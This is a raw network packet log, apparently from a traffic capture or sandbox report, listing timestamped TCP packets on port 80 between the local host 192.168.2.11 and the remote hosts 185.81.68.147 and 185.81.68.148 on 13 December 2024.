                                                                                                                                                                                                Dec 13, 2024 08:20:14.136789083 CET8049958185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:14.136811972 CET8049958185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:14.136831045 CET8049961185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:14.137104034 CET4995880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:14.137104988 CET4995880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:14.137126923 CET8049961185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:14.137213945 CET4996180192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:14.138628960 CET4996180192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:14.144578934 CET8049958185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:14.144601107 CET8049958185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:14.144644022 CET4995880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:14.144741058 CET4995880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:14.152602911 CET8049958185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:14.152750015 CET4995880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:14.247035980 CET4996480192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:14.258420944 CET8049961185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:14.262506962 CET8049958185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:14.262520075 CET8049958185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:14.262809038 CET4995880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:14.263977051 CET8049958185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:14.263993025 CET8049958185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:14.264761925 CET4995880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:14.264761925 CET4995880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:14.268940926 CET8049958185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:14.268954039 CET8049958185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:14.269186974 CET4995880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:14.269186974 CET4995880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:14.273859024 CET8049958185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:14.273874044 CET8049958185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:14.273963928 CET4995880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:14.273963928 CET4995880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:14.278871059 CET8049958185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:14.278889894 CET8049958185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:14.278991938 CET4995880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:14.278991938 CET4995880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:14.283509016 CET8049958185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:14.283659935 CET4995880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:14.283695936 CET8049958185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:14.283740997 CET4995880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:14.288212061 CET8049958185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:14.288279057 CET8049958185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:14.288300991 CET4995880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:14.288428068 CET4995880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:14.292917013 CET8049958185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:14.293083906 CET4995880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:14.293118954 CET8049958185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:14.295331955 CET4995880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:14.297703028 CET8049958185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:14.297720909 CET8049958185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:14.298096895 CET4995880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:14.298098087 CET4995880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:14.302391052 CET8049958185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:14.302534103 CET8049958185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:14.302571058 CET4995880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:14.302571058 CET4995880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:14.307071924 CET8049958185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:14.307235956 CET8049958185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:14.307272911 CET4995880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:14.307272911 CET4995880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:14.312361002 CET8049958185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:14.312385082 CET8049958185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:14.312418938 CET4995880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:14.312472105 CET4995880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:14.316718102 CET8049958185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:14.316734076 CET8049958185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:14.316776037 CET4995880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:14.316776991 CET4995880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:14.321490049 CET8049958185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:14.321508884 CET8049958185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:14.321567059 CET4995880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:14.321567059 CET4995880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:14.326282024 CET8049958185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:14.326298952 CET8049958185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:14.326328993 CET4995880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:14.326376915 CET4995880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:14.330957890 CET8049958185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:14.330976963 CET8049958185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:14.331010103 CET4995880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:14.331057072 CET4995880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:14.335567951 CET8049958185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:14.335586071 CET8049958185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:14.335613966 CET4995880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:14.335659027 CET4995880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:14.340475082 CET8049958185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:14.340531111 CET4995880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:14.340543985 CET8049958185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:14.340683937 CET4995880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:14.345006943 CET8049958185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:14.345092058 CET4995880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:14.367121935 CET8049964185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:14.367208004 CET4996480192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:14.367285967 CET4996480192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:14.454602957 CET8049958185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:14.454627991 CET8049958185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:14.454776049 CET4995880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:14.454776049 CET4995880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:14.456552982 CET8049958185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:14.456574917 CET8049958185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:14.456609011 CET4995880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:14.456691027 CET4995880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:14.460347891 CET8049958185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:14.460429907 CET4995880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:14.460477114 CET8049958185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:14.460575104 CET4995880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:14.464226961 CET8049958185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:14.464251995 CET8049958185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:14.464368105 CET4995880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:14.464368105 CET4995880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:14.468139887 CET8049958185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:14.468164921 CET8049958185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:14.468755960 CET4995880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:14.468756914 CET4995880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:14.471839905 CET8049958185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:14.471862078 CET8049958185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:14.472134113 CET4995880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:14.472134113 CET4995880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:14.475644112 CET8049958185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:14.475670099 CET8049958185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:14.475840092 CET4995880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:14.476317883 CET4995880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:14.479166985 CET8049958185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:14.479190111 CET8049958185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:14.479336023 CET4995880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:14.479336023 CET4995880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:14.482805014 CET8049958185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:14.482826948 CET8049958185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:14.482855082 CET4995880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:14.482907057 CET4995880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:14.486341953 CET8049958185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:14.486428976 CET4995880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:14.486444950 CET8049958185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:14.486483097 CET4995880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:14.486963987 CET8049964185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:14.487015009 CET4996480192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:14.490304947 CET8049958185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:14.490324020 CET8049958185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:14.490502119 CET4995880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:14.490502119 CET4995880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:14.493542910 CET8049958185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:14.493591070 CET4995880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:14.493722916 CET8049958185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:14.493763924 CET4995880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:14.497227907 CET8049958185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:14.497283936 CET4995880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:14.497354984 CET8049958185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:14.497395992 CET4995880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:14.500933886 CET8049958185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:14.500951052 CET8049958185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:14.500988960 CET4995880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:14.501013041 CET4995880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:14.504591942 CET8049958185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:14.504645109 CET4995880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:14.504669905 CET8049958185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:14.504712105 CET4995880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:14.508192062 CET8049958185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:14.508243084 CET4995880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:14.508351088 CET8049958185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:14.508390903 CET4995880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:14.511878014 CET8049958185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:14.511921883 CET8049958185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:14.511928082 CET4995880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:14.511986971 CET4995880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:14.515549898 CET8049958185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:14.515614986 CET4995880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:14.606987953 CET8049964185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:14.952500105 CET4996880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:15.072264910 CET8049968185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:15.072375059 CET4996880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:15.128679991 CET4996880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:15.220144033 CET4996980192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:15.248518944 CET8049968185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:15.339947939 CET8049969185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:15.340034008 CET4996980192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:15.364738941 CET4996980192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:15.484440088 CET8049969185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:15.488353014 CET4995980192.168.2.11185.81.68.148
                                                                                                                                                                                                Dec 13, 2024 08:20:15.488647938 CET4997080192.168.2.11185.81.68.148
                                                                                                                                                                                                Dec 13, 2024 08:20:15.490458965 CET4995880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:15.490534067 CET4996080192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:15.490773916 CET4997180192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:15.608423948 CET8049970185.81.68.148192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:15.608491898 CET4997080192.168.2.11185.81.68.148
                                                                                                                                                                                                Dec 13, 2024 08:20:15.608666897 CET8049959185.81.68.148192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:15.608722925 CET4995980192.168.2.11185.81.68.148
                                                                                                                                                                                                Dec 13, 2024 08:20:15.610372066 CET8049958185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:15.610415936 CET4995880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:15.610462904 CET8049971185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:15.610526085 CET4997180192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:15.610785007 CET8049960185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:15.610821009 CET4996080192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:15.628570080 CET4997080192.168.2.11185.81.68.148
                                                                                                                                                                                                Dec 13, 2024 08:20:15.628715992 CET4997180192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:15.668528080 CET4997280192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:15.748429060 CET8049970185.81.68.148192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:15.748445034 CET8049971185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:15.788319111 CET8049972185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:15.788414955 CET4997280192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:15.805485010 CET4997280192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:15.910650969 CET4997380192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:15.925446033 CET8049972185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:15.986763954 CET8049964185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:15.986881971 CET8049964185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:15.986953974 CET4996480192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:15.990566015 CET4996480192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:16.030499935 CET8049973185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:16.030579090 CET4997380192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:16.063693047 CET4997380192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:16.106414080 CET4997580192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:16.110266924 CET8049964185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:16.183595896 CET8049973185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:16.226325989 CET8049975185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:16.226489067 CET4997580192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:16.226548910 CET4997580192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:16.346409082 CET8049975185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:16.346513987 CET4997580192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:16.425815105 CET8049968185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:16.426069021 CET4996880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:16.466352940 CET8049975185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:16.736834049 CET8049969185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:16.736907959 CET4996980192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:16.961067915 CET4997780192.168.2.11185.81.68.148
                                                                                                                                                                                                Dec 13, 2024 08:20:16.961965084 CET4997880192.168.2.11185.81.68.148
                                                                                                                                                                                                Dec 13, 2024 08:20:16.971241951 CET8049970185.81.68.148192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:16.971318960 CET4997080192.168.2.11185.81.68.148
                                                                                                                                                                                                Dec 13, 2024 08:20:16.972544909 CET8049971185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:16.972616911 CET4997180192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:17.081907988 CET8049977185.81.68.148192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:17.082086086 CET4997780192.168.2.11185.81.68.148
                                                                                                                                                                                                Dec 13, 2024 08:20:17.082473040 CET8049978185.81.68.148192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:17.082824945 CET4997880192.168.2.11185.81.68.148
                                                                                                                                                                                                Dec 13, 2024 08:20:17.091058016 CET4997780192.168.2.11185.81.68.148
                                                                                                                                                                                                Dec 13, 2024 08:20:17.091485023 CET4997880192.168.2.11185.81.68.148
                                                                                                                                                                                                Dec 13, 2024 08:20:17.125830889 CET8049972185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:17.125957966 CET4997280192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:17.171762943 CET4998280192.168.2.11185.81.68.148
                                                                                                                                                                                                Dec 13, 2024 08:20:17.210922003 CET8049977185.81.68.148192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:17.211158991 CET8049978185.81.68.148192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:17.291546106 CET8049982185.81.68.148192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:17.291631937 CET4998280192.168.2.11185.81.68.148
                                                                                                                                                                                                Dec 13, 2024 08:20:17.293344975 CET4998280192.168.2.11185.81.68.148
                                                                                                                                                                                                Dec 13, 2024 08:20:17.363583088 CET8049973185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:17.363862038 CET4997380192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:17.413029909 CET8049982185.81.68.148192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:17.416698933 CET4998380192.168.2.11185.81.68.148
                                                                                                                                                                                                Dec 13, 2024 08:20:17.536499977 CET8049983185.81.68.148192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:17.536662102 CET4998380192.168.2.11185.81.68.148
                                                                                                                                                                                                Dec 13, 2024 08:20:17.545290947 CET4998380192.168.2.11185.81.68.148
                                                                                                                                                                                                Dec 13, 2024 08:20:17.665291071 CET8049983185.81.68.148192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:17.915395021 CET8049975185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:17.915501118 CET8049975185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:17.915580988 CET4997580192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:17.916843891 CET4997580192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:18.028107882 CET4998480192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:18.036564112 CET8049975185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:18.147953987 CET8049984185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:18.148047924 CET4998480192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:18.148117065 CET4998480192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:18.268100023 CET8049984185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:18.268423080 CET4998480192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:18.388238907 CET8049984185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:18.471235991 CET8049978185.81.68.148192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:18.474963903 CET4997880192.168.2.11185.81.68.148
                                                                                                                                                                                                Dec 13, 2024 08:20:18.502948046 CET8049977185.81.68.148192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:18.503048897 CET4997780192.168.2.11185.81.68.148
                                                                                                                                                                                                Dec 13, 2024 08:20:18.624893904 CET4997080192.168.2.11185.81.68.148
                                                                                                                                                                                                Dec 13, 2024 08:20:18.625166893 CET4998780192.168.2.11185.81.68.148
                                                                                                                                                                                                Dec 13, 2024 08:20:18.625313044 CET4997180192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:18.625554085 CET4998880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:18.626048088 CET8049982185.81.68.148192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:18.626118898 CET4998280192.168.2.11185.81.68.148
                                                                                                                                                                                                Dec 13, 2024 08:20:18.745017052 CET8049987185.81.68.148192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:18.745052099 CET8049970185.81.68.148192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:18.745162964 CET4997080192.168.2.11185.81.68.148
                                                                                                                                                                                                Dec 13, 2024 08:20:18.745196104 CET8049988185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:18.745230913 CET4998780192.168.2.11185.81.68.148
                                                                                                                                                                                                Dec 13, 2024 08:20:18.745245934 CET4998880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:18.745469093 CET8049971185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:18.745523930 CET4997180192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:18.747425079 CET4998780192.168.2.11185.81.68.148
                                                                                                                                                                                                Dec 13, 2024 08:20:18.747844934 CET4998880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:18.867698908 CET8049987185.81.68.148192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:18.867908955 CET8049988185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:18.870853901 CET8049983185.81.68.148192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:18.870922089 CET4998380192.168.2.11185.81.68.148
                                                                                                                                                                                                Dec 13, 2024 08:20:19.751533031 CET8049984185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:19.751715899 CET8049984185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:19.751786947 CET4998480192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:19.781323910 CET4998480192.168.2.11185.81.68.147
